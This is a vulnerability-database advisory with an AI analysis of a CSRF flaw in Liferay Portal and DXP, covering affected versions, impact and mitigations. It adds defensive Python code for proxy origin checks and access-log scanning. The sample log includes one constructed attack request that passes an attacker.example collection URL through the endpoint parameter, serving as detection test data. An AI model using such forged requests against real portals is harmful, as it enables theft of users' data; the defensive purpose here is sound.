CVE-2025-43745: CWE-352 Cross-Site Request Forgery (CSRF) in Liferay Portal
A CSRF vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q2.0 through 2025.Q2.7, 2025.Q1.0 through 2025.Q1.14, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.19 and 7.4 GA through update 92 allows remote attackers to perform a cross-origin request on behalf of the authenticated user via the endpoint parameter.
AI Analysis
Technical Summary
CVE-2025-43745 is a Cross-Site Request Forgery (CSRF) vulnerability in Liferay Portal and Liferay DXP, affecting Portal 7.4.0 through 7.4.3.132, 7.4 GA through update 92, and the DXP quarterly releases from 2024.Q1 through 2025.Q2 listed in the description. A remote attacker can cause a cross-origin request to be issued on behalf of an authenticated user by abusing the endpoint parameter. CSRF works because browsers attach the victim's session cookies to requests that an attacker-controlled page triggers, so a request that the application cannot distinguish from a user-initiated one is accepted under the victim's identity. Here the protection that should reject such a request (Liferay normally binds state-changing portlet action requests to a per-session authentication token) is missing or bypassed on the code path reached through the endpoint parameter; the CVE text does not say which feature exposes that parameter. The CVSS v4.0 base score is 6.9 (medium). The reported vector components are network attack vector (AV:N), no privileges required (PR:N), no special attack requirements (AT:N), and active user interaction (UI:A), that is, the victim must visit or click something the attacker controls while logged in. Note that AT:N means "Attack Requirements: None" (no preconditions such as a race or a specific deployment), not "no authentication"; the victim must be authenticated for the attack to have any effect. The reported impact is high on confidentiality (VC:H) with no integrity or availability impact, so the most defensible reading of the page's own data is that the forged request can expose data accessible to the victim's session rather than change state; earlier speculation about changing settings or triggering administrative functions is not supported by that rating. No exploitation in the wild is reported. The page carries no patch link, but the affected ranges have explicit upper bounds (for example 7.4.3.132 and 2025.Q2.7), which indicates that subsequent releases contain the fix; confirm the exact fixed versions against Liferay's own advisory rather than this entry.
Potential Impact
For European organizations running Liferay Portal or Liferay DXP, the exposure is greatest where an affected version backs an intranet portal, a customer-facing site, or an internal collaboration platform whose users stay logged in for long periods. Successful exploitation performs a request under the identity of a legitimate user and, per the reported rating, can expose data that user is entitled to see. Because Liferay is common in the public sector, financial institutions, and large enterprises in Europe, the realistic outcome is a confidentiality breach and the reputational and regulatory consequences that follow; for personal data this engages GDPR obligations, including breach notification. The user-interaction requirement means delivery is through phishing, a malicious or compromised web page, or any other lure that gets a logged-in user to load attacker-controlled content. The absence of known exploits lowers immediate risk but not the threat: CSRF proof-of-concepts are cheap to build once the affected request is known, and the affected-version list is public.
Mitigation Recommendations
Organizations should upgrade Liferay Portal or Liferay DXP to a release beyond the affected ranges; the bounded version lists in the description indicate that fixed builds exist, and Liferay's advisory is the authoritative source for the exact version or hotfix. Until the upgrade is done, the compensating controls worth deploying are the ones that actually break the CSRF precondition. Enforce same-origin checks at the reverse proxy or WAF in front of the portal: reject requests to state-relevant portal URLs whose Origin header (or, failing that, Referer) is absent, "null", or not the portal's own origin; a generic "block suspicious cross-origin requests" rule is not enough, the rule has to name the portal origin and the request shapes it protects. Set the SameSite attribute on the session cookie, for example through the Tomcat CookieProcessor's sameSiteCookies setting in the bundled Tomcat's context.xml; Lax stops cross-site POSTs but still allows top-level GET navigations, so it is only a partial mitigation if the affected request can be issued as a GET, which the CVE text does not rule out. Note that a Content Security Policy on the portal does not help against CSRF: CSP governs what the portal's pages may load, not what other sites may send to the portal. Anti-CSRF tokens are Liferay's responsibility in this case, since the flaw is that the endpoint-parameter path is not covered by the portal's existing token check; there is no portal setting that retrofits it. Reduce blast radius by reviewing which users hold broad read permissions on sensitive content, since the forged request inherits whatever the victim can see. For detection, review access logs for successful requests to portal action URLs, and for requests carrying an endpoint parameter, whose Referer is missing or from a foreign origin; such entries are noisy (referrer policies strip Referer legitimately) but are a usable triage signal. Finally, disable or restrict portal features that are not needed, which removes endpoints that would otherwise be reachable through a forged request. User awareness training against phishing remains useful but is a weak control here, because the victim only has to load a page.
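The following is an added example, not code from Liferay or from this advisory's source. It implements the two controls described above for a reverse proxy in front of a portal: a same-origin verdict on incoming requests (Origin header first, Referer as fallback) and a scan of access-log lines for cross-origin state-relevant requests. It treats Liferay's conventional action-phase marker p_p_lifecycle=1 as state-relevant and additionally flags any request carrying an endpoint parameter, because the CVE text names that parameter; the portal origin, the URL paths, and the log lines are constructed for the example, and the assumption that the parameter travels as a query or form field named endpoint is an assumption, not something the CVE text confirms.

```python
"""Added example (not Liferay's code): same-origin enforcement for a reverse
proxy in front of a Liferay portal, plus an access-log scan for cross-origin
state-relevant requests. All hosts, paths and log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the portal is served from exactly this origin. Add every
# scheme/host/port combination that users legitimately use.
PORTAL_ORIGINS = {"https://portal.example.com"}
UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def origin_of(url):
    """Return 'scheme://host[:port]' in lowercase, or None if url has no host."""
    p = urlsplit(url)
    if not p.scheme or not p.netloc:
        return None
    return f"{p.scheme}://{p.netloc}".lower()


def is_state_relevant(method, target):
    """True for unsafe methods, Liferay action-phase URLs (p_p_lifecycle=1), and
    any request carrying an `endpoint` parameter (assumption: the parameter from
    the CVE text is a query/form field by that name, reachable via GET or POST)."""
    qs = parse_qs(urlsplit(target).query)
    return (method.upper() in UNSAFE_METHODS
            or qs.get("p_p_lifecycle", [""])[0] == "1"
            or "endpoint" in qs)


def csrf_verdict(method, target, headers):
    """Return 'allow' or 'block' for one request. Browsers send Origin on
    cross-site POSTs and on fetch/XHR, and Referer on most navigations; a
    state-relevant request with neither, with Origin 'null', or with a foreign
    source is blocked. Non-state-relevant requests are always allowed."""
    if not is_state_relevant(method, target):
        return "allow"
    h = {k.lower(): v for k, v in headers.items()}
    src = h.get("origin") or origin_of(h.get("referer", ""))
    if src is None or src == "null":
        return "block"
    return "allow" if src.lower() in PORTAL_ORIGINS else "block"


# Combined log format: ip ident user [ts] "METHOD target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')


def scan_access_log(lines):
    """Return (timestamp, ip, target, referer) for successful (2xx/3xx)
    state-relevant requests whose Referer is absent or from a foreign origin.
    Access logs rarely record Origin, so Referer is the only signal; referrer
    policies strip it legitimately, so treat hits as triage leads, not proof."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_state_relevant(m["method"], m["target"]):
            continue
        if m["status"][0] not in "23":
            continue
        ref = None if m["referer"] == "-" else origin_of(m["referer"])
        if ref not in PORTAL_ORIGINS:
            hits.append((m["ts"], m["ip"], m["target"], m["referer"]))
    return hits


# Constructed sample log. The /c/portal/hypothetical path is a placeholder; only
# the parameter name `endpoint` comes from the CVE text.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Aug/2025:18:48:15 +0000] "GET /web/guest/home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Aug/2025:18:48:20 +0000] "POST /group/intranet/docs?p_p_id=com_example_portlet&p_p_lifecycle=1&p_auth=abc123 HTTP/1.1" 302 0 "https://portal.example.com/group/intranet/docs" "Mozilla/5.0"',
    '198.51.100.9 - - [19/Aug/2025:18:49:02 +0000] "GET /c/portal/hypothetical?endpoint=https%3A%2F%2Fattacker.example%2Fcollect HTTP/1.1" 200 311 "https://attacker.example/lure.html" "Mozilla/5.0"',
    '198.51.100.9 - - [19/Aug/2025:18:49:05 +0000] "POST /group/intranet/docs?p_p_id=com_example_portlet&p_p_lifecycle=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("cross-origin state-relevant request:", hit)
```

The proxy check deliberately allows same-origin requests that carry no Origin header only when the Referer confirms the origin; a stricter deployment can require Origin outright for unsafe methods, at the cost of breaking older clients. The log scan is a triage aid: the two constructed hits (a GET with a foreign Referer carrying an endpoint parameter, and an action POST with no Referer) are exactly the shapes to pull for investigation, but a missing Referer alone is not evidence of an attack.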
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Belgium, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: Liferay
- Date Reserved: 2025-04-17T10:55:23.316Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68a4c6efad5a09ad00fa2970
Added to database: 8/19/2025, 6:48:15 PM
Last enriched: 8/19/2025, 7:03:38 PM
Last updated: 8/19/2025, 7:32:50 PM
Related Threats
- CVE-2025-9165: Memory Leak in LibTIFF (Medium)
- CVE-2025-9157: Use After Free in appneta tcpreplay (Medium)
- CVE-2025-51529: n/a (Medium)
- CVE-2025-50579: n/a (Medium)
- CVE-2025-55740: CWE-1392: Use of Default Credentials in Anipaleja nginx-defender (Medium)